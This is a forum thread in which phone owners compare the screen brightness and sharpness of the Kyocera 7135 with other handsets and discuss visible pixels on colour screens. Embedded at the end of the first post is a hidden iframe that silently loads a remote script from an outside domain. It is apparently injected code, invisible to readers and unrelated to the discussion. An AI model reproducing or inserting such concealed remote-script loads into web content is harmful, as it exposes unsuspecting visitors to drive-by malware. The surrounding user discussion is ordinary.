+ Reply to Thread

7135 Screen brightness/clarity?

Hi ....

I am a 6035 user awaiting 7135 availability from Verizon.

This past weekend, my wife and I traded in her old Startac for an LG VX4400 from Verizon. I was wondering if any of you who have seen the 7135 could comment on how the brightness, color, clarity, and sharpness of the 7135's screen compares to that of a non-smart phone like the VX4400.

I was very impressed with the screen on my wife's phone, and if the 7135 is as sharp and bright, I'll be camping out in front of my Verizon store when they do finally announce availability.

Thanks in advance for your observations.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It is very bright and sharp. It is both brighter and sharper than my wife's new Moto T720. I keep the brightness turned almost all the way down (to save battery) and I can still see it in all but direct sunlight. In sunlight if I turn the brightness up to full.

Alan

Its like night and day (speaking of going from the 6035 to 7135)
    Your gonna LOVE the brilliant display of the 7135!

There's a cost though... battery life is like day and the dark side of the moon.

GET TWO BATTERIES!
    Happy camping!
    <bugle>

I agree with the others. You had better put on sunscreen before using this phone!:suave
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I agree with the others. You had better put on sunscreen before using this phone!:suave
    Attached Files
    iPhone therefore iAm.

Screen clarity/brightness

I'm new to this forum, so I hope I'm not asking when I should be replying here. Here goes anyway. I just received my 7135 from Get Connected. I'm I former Treo 180 user, so I'm not used to a color screen, and that's where my question comes in. First, I thought the screen would be brigher (I have the brightness turned all the way up). That's not much of an issue though. My concern and question relates to the screen background. The best way I can describe it is that rather than seeing a "smooth" white background, it appears that the background is more grainy, almost like I can see the tiny dots that make up the screen. How clear should the background be? Am I being too picky, or is this how the screen should appear. Other than looking at another 7135 (tough, since they are not in the Verizon stores yet), is there anything I can compare my screen to in order to determine if it's ok?? Thanks for any insight you can provide.

Steve

Re: Screen clarity/brightness

Originally posted by Nevets750
    I'm new to this forum, so I hope I'm not asking when I should be replying here. Here goes anyway. I just received my 7135 from Get Connected. I'm I former Treo 180 user, so I'm not used to a color screen, and that's where my question comes in. First, I thought the screen would be brigher (I have the brightness turned all the way up). That's not much of an issue though. My concern and question relates to the screen background. The best way I can describe it is that rather than seeing a "smooth" white background, it appears that the background is more grainy, almost like I can see the tiny dots that make up the screen. How clear should the background be? Am I being too picky, or is this how the screen should appear. Other than looking at another 7135 (tough, since they are not in the Verizon stores yet), is there anything I can compare my screen to in order to determine if it's ok?? Thanks for any insight you can provide.

Steve
    That doesn't sound right. Mine is uncomfortably bright if turned all the way up and is very sharp and clear. Where are you located? Maybe you could meet another 7135 owner from the board to compare.

Alan

Re: Re: Screen clarity/brightness

Originally posted by alanb
    That doesn't sound right. Mine is uncomfortably bright if turned all the way up and is very sharp and clear.
    I think I know what he's talking about. If I stare really hard at my screen I can see the pixels. I think it's just a matter of not being used to a color screen. I never had a color screen before the 7135 and Treo, and it took a little getting used to.
    Please visit my picture site: Robert-O-Rama :)

Re: Re: Re: Screen clarity/brightness

Originally posted by Robert K.
    I think I know what he's talking about. If I stare really hard at my screen I can see the pixels. I think it's just a matter of not being used to a color screen. I never had a color screen before the 7135 and Treo, and it took a little getting used to.
    I had same reaction back in my IIIc days..If you look too close its Kinda like sitting a foot from a TV! No big deal though Just more definition of the pixels due to more variations in colors between the pixels...in other words grey & black pixels have less contrast than White & black, or blue.
    iPhone therefore iAm.